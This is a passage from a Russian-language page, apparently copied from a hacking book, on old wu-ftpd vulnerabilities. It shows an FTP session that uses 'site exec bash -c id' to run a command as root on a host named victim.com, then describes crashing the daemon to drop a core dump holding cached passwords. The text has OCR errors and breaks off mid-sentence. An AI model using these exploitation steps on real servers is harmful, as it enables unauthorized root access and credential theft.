Главная Случайная страница Контакты | Мы поможем в написании вашей работы! | ||
|
Кракера в wu-ftp есть специальная команда, которая так и называется site
exec (выполнить на сайте) evil" ftp victim.com
220 victim FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994)
Ready.
Name (victim: root): good
Password required for good.
Password: *****
User good logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp" quote "site exec bash -c id"
Bash -с id
200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users)
groups^lOO(users)
200 (end of' bash-c id')
Видно, что в последней строчке па удаленном хосте выполнилась коман- _ да
Id от имени суперпользователя, это означает, что хост уязвим..
Другая уязвимость, которой подвержены версии wu-ftpd (1996-1997 гг.),
Состояла в том, что при определенных условиях можно переполнить список
Аргументов команды, а это приведет к сбросу демоном аварийного дампа
Памяти. Для этого нужны минимальные полномочия анонимного пользователя
Ftp. Самое интересное, владельцем дампа будет не root, как обычно бывает,
A anonymous, и дамп будет сбрасываться в его домашний каталог. Отсюда
Следует, что он позже может быть прочитан удаленно. Ну а чтение аварийного
Дамeна равносильно копанию в корзине для бумаг на секретном объекте -
Среди мусора находятся очень любопытные вещи, например сброшенные
Кэшированные пароли. Так что злоумышленнику останется только запустить
Дата публикования: 2014-11-04; Прочитано: 308 | Нарушение авторского права страницы | Мы поможем в написании вашей работы!